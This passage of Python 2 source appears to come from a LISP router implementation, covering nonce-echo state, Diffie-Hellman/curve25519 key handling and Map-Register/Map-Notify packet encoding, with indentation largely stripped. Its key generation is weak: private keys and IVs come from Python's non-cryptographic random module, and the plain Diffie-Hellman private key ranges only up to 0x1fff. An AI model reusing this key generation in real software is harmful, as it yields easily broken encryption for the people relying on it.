if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
        # Check how long it's been since the last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
        # sent recently, say the echo happened so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
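    #
    # Note the IV width returned above depends on the cipher suite: 8 bytes
    # for chacha20, 12 bytes for AES-GCM, and 16 bytes for AES-CBC.
    #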
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
        # it's a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
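        # For example (illustrative), the 256-bit HMAC-SHA256 output is split
        # in half: the upper 128 bits become the encrypt-key and the lower
        # 128 bits become the ICV key, zero-filled to 32 or 40 hex characters
        # depending on whether poly1305 or sha256 is used for the ICV.
        #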
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
        # is enough packet to pull the key out according to the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
        # Iterate to pull 8 bytes (64-bits) out at a time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid is 1 of 8 values that describes the encryption key-id used for
# encrypting Map-Register messages. When the Map-Register is encrypted, the
# entire message, not including the first 4 bytes, is chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
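# As an illustrative (assumed) example of the encoding below, a Map-Register
# built with encryption-key-id 3 sets bit 0x2000 (the e-bit) and ORs in
# (3 << 14) into the first long; the decoder reverses this by testing
# first_long & 0x2000 and extracting (first_long >> 14) & 0x7.
#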
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
        # Append zeroed authentication data so we can compute the hash later.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
        if (len(packet) < format_size): return(False)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
#
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
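# The helper below is an illustrative sketch only and is not called by the
# code. It shows how Map-Notify authentication data is produced, mirroring
# lisp_map_notify.encode(): the hash is run over the header plus EID-records
# with the authentication field zeroed, and the result is then written back
# into that field. It relies on this module's lisp_hash_me() and struct
# imports and assumes the hash length equals the authentication field length.
#
def lisp_example_map_notify_auth(packet_with_zeroed_auth, alg_id, password):
    hashval = lisp_hash_me(packet_with_zeroed_auth, alg_id, password, False)

    #
    # The auth field starts right after the first long, nonce, key-id,
    # alg-id, and auth-length fields.
    #
    offset = struct.calcsize("I") + struct.calcsize("QHH")
    return(packet_with_zeroed_auth[0:offset] + hashval +
        packet_with_zeroed_auth[offset + len(hashval)::])
#enddef
#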
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
    def zero_auth(self, packet):
        auth_data = ""
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
